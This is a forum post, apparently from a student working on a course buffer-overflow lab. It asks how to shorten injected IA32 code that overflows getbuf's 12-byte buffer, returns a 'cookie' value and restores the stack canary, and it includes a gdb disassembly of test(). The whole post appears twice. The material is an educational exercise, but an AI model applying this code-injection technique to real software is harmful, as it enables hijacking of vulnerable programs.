mindspin311
03-26-2005, 09:40 PM
Hi. I'm having a problem exploiting a buffer string, and returning back to the main function as if nothing happened.
I have a function:
1 int getbuf()
2 {
3 char buf[12];
4 Gets(buf);
5 return 1;
6 }
*Note that 24 bytes of memory is allocated, so I have 28 bytes for the code, and 4 more for the return addy*
I send a string which generates the following IA32 assembly code:
mov $0x162febc1, %eax #returns cookie instead of 1
mov $0x80489f1, %ebp #old return addy of getbuf.
#returns to test()
#after getbuf is called
movl $0xdeadbeef , -4(%ebp) #old local variable of
#test. Used in test after
#call of getbuf to check
#for corruption of stack.
movl $0x8048984, 4($ebp) #return addy of test which
#goes back to main
pushl $0x80489f1 #push the return addy
ret #I hope this works ^^
(nop's to fill in extra space if applicable)
(return address: points to first line of program)
*Note that this would work, but it's a few bytes to long. I've tried replaceing the push with push %ebp...
but then I get some wierd code that I didn't write.. like pop (%eax,%eax,1) or even addresses are altered pointing to different parts of the program or dead memory.
I have to get this code to work in 28 bytes.
(The return addy bytes: 29-32 is fine)
Any suggestions of shortening the code? or why I get wierd assembly code when I try to mess around with it?
Heres the code for test also:
Dump of assembler code for function test:
0x080489d8 <test+0>: push %ebp
0x080489d9 <test+1>: mov %esp,%ebp
0x080489db <test+3>: sub $0x14,%esp
0x080489de <test+6>: push $0x3
0x080489e0 <test+8>: movl $0xdeadbeef,0xfffffffc(%ebp)
0x080489e7 <test+15>: call 0x8048c3c <entry_check>
0x080489ec <test+20>: call 0x8048a48 <getbuf>
0x080489f1 <test+25>: mov %eax,%edx
0x080489f3 <test+27>: mov 0xfffffffc(%ebp),%eax
0x080489f6 <test+30>: add $0x10,%esp
0x080489f9 <test+33>: cmp $0xdeadbeef,%eax
0x080489fe <test+38>: je 0x8048a14 <test+60>
0x08048a00 <test+40>: sub $0xc,%esp
0x08048a03 <test+43>: push $0x8049620
0x08048a08 <test+48>: call 0x80486ec <puts>
0x08048a0d <test+53>: add $0x10,%esp
0x08048a10 <test+56>: leave
0x08048a11 <test+57>: ret
0x08048a12 <test+58>: mov %esi,%esi
0x08048a14 <test+60>: cmp 0x804a01c,%edx
0x08048a1a <test+66>: je 0x8048a2c <test+84>
0x08048a1c <test+68>: sub $0x8,%esp
0x08048a1f <test+71>: push %edx
0x08048a20 <test+72>: push $0x804941f
0x08048a25 <test+77>: call 0x804873c <printf>
0x08048a2a <test+82>: jmp 0x8048a0d <test+53>
0x08048a2c <test+84>: sub $0x8,%esp
0x08048a2f <test+87>: push %edx
0x08048a30 <test+88>: push $0x804943a
0x08048a35 <test+93>: call 0x804873c <printf>
0x08048a3a <test+98>: movl $0x3,(%esp,1)
0x08048a41 <test+105>: call 0x8048c4c <validate>
0x08048a46 <test+110>: jmp 0x8048a0d <test+53>
I have a function:
1 int getbuf()
2 {
3 char buf[12];
4 Gets(buf);
5 return 1;
6 }
*Note that 24 bytes of memory is allocated, so I have 28 bytes for the code, and 4 more for the return addy*
I send a string which generates the following IA32 assembly code:
mov $0x162febc1, %eax #returns cookie instead of 1
mov $0x80489f1, %ebp #old return addy of getbuf.
#returns to test()
#after getbuf is called
movl $0xdeadbeef , -4(%ebp) #old local variable of
#test. Used in test after
#call of getbuf to check
#for corruption of stack.
movl $0x8048984, 4($ebp) #return addy of test which
#goes back to main
pushl $0x80489f1 #push the return addy
ret #I hope this works ^^
(nop's to fill in extra space if applicable)
(return address: points to first line of program)
*Note that this would work, but it's a few bytes to long. I've tried replaceing the push with push %ebp...
but then I get some wierd code that I didn't write.. like pop (%eax,%eax,1) or even addresses are altered pointing to different parts of the program or dead memory.
I have to get this code to work in 28 bytes.
(The return addy bytes: 29-32 is fine)
Any suggestions of shortening the code? or why I get wierd assembly code when I try to mess around with it?
Heres the code for test also:
Dump of assembler code for function test:
0x080489d8 <test+0>: push %ebp
0x080489d9 <test+1>: mov %esp,%ebp
0x080489db <test+3>: sub $0x14,%esp
0x080489de <test+6>: push $0x3
0x080489e0 <test+8>: movl $0xdeadbeef,0xfffffffc(%ebp)
0x080489e7 <test+15>: call 0x8048c3c <entry_check>
0x080489ec <test+20>: call 0x8048a48 <getbuf>
0x080489f1 <test+25>: mov %eax,%edx
0x080489f3 <test+27>: mov 0xfffffffc(%ebp),%eax
0x080489f6 <test+30>: add $0x10,%esp
0x080489f9 <test+33>: cmp $0xdeadbeef,%eax
0x080489fe <test+38>: je 0x8048a14 <test+60>
0x08048a00 <test+40>: sub $0xc,%esp
0x08048a03 <test+43>: push $0x8049620
0x08048a08 <test+48>: call 0x80486ec <puts>
0x08048a0d <test+53>: add $0x10,%esp
0x08048a10 <test+56>: leave
0x08048a11 <test+57>: ret
0x08048a12 <test+58>: mov %esi,%esi
0x08048a14 <test+60>: cmp 0x804a01c,%edx
0x08048a1a <test+66>: je 0x8048a2c <test+84>
0x08048a1c <test+68>: sub $0x8,%esp
0x08048a1f <test+71>: push %edx
0x08048a20 <test+72>: push $0x804941f
0x08048a25 <test+77>: call 0x804873c <printf>
0x08048a2a <test+82>: jmp 0x8048a0d <test+53>
0x08048a2c <test+84>: sub $0x8,%esp
0x08048a2f <test+87>: push %edx
0x08048a30 <test+88>: push $0x804943a
0x08048a35 <test+93>: call 0x804873c <printf>
0x08048a3a <test+98>: movl $0x3,(%esp,1)
0x08048a41 <test+105>: call 0x8048c4c <validate>
0x08048a46 <test+110>: jmp 0x8048a0d <test+53>